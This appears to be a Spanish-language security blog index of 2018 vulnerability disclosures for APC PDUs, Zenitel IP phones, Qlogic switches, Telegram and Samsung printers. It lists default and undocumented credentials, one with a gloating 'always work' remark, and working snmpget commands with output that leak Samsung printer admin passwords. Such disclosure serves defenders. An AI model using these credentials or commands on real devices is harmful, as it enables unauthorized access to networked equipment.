sábado, 8 de diciembre de 2018

[American Power Conversion] Rack PDU; Múltiples inyecciones.


[*] Vuln;       "Multiple injections"
[*] Vendor: "American Power Conversion"
[*] Producto: "Network Management Card AOS/ Rack PDU APP"
[*] Version: "v3.5.x"



(AP7900)





# Credentials
--------------
USER: device
PASS: apc

miércoles, 5 de diciembre de 2018

[Zenitel] IP-StationWeb, Cross Site Script (CVE-2018-19927 & CVE-2018-19926 )


Aplicaciones web para la gestión de Telefónia IP de la firma Zenitel

Vendor: Zenitel Norway ASA
Software: 02.03.3.3 < 4.2.3.9
HW: v1




***



**


***


Credenciales por defecto (Siempre funcionan) 😈

user: admin
pass: alphaadmin


martes, 4 de diciembre de 2018

Abusando del "Preview" Telegram para conseguir una shell reversa

Asumiendo que ya han pasado por mi anterior post, voy iniciar directamente con una nueva POC, abusando de la funcionalidad del preview que nos ofrece Telegram:
(Inpirado en la idea del colega Pablo Videla  )




domingo, 2 de diciembre de 2018

TELEGRAM (Siempre) In-The-Middle

Como muchos informáticos involucrados en el mundo de la seguridad informática soy un desconfiado de la tecnología. 

De las distintas opciones que existe respecto a los clientes de mensajería personalmente no confió en ninguna promesas de confidencialidad y/o privacidad .

Estoy seguro que muchos estarán de acuerdo conmigo sin embargo estas paranoias han estado carentes de evidencias que sostengan estas desconfianzas.




martes, 9 de octubre de 2018

[Qlogic] 4G & 4/8G Fibre Channel Switch Module for IBM BladeCenter (CVE-2018-18202 )

Users (prom, diags and support) are not documented in the Qlogic 4/8G documentation, and those users  have the same login name as password


Affected System:  

  • QLogic(R) 4Gb Fibre Channel Switch Module for IBM BladeCenter(R)
  • QLogic(R) 20-Port 4/8 Gb SAN Switch Module for IBM BladeCenter(R)

jueves, 4 de octubre de 2018

miércoles, 3 de octubre de 2018

#Samsung #printer #passwordLeak ( CVE-2018-17969 )


Problemas con el acceso ?



No problema!
Passwords leaks, via SNMP !

Poc 


USUARIO:
$ snmpget -v 1 -c public 192.168.0.22 iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0
> iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0 = STRING: "admin"

PASSWORD:
$ snmpget -v 1 -c public 192.168.0.22 iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0
> iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0 = STRING: "1111"




Challenge success !!!





Saludos,
@capitan_alfa